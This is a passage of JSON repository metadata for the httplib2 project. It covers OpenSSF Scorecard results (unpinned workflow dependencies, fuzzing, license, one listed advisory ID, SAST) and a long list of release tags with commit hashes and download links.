.github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"ht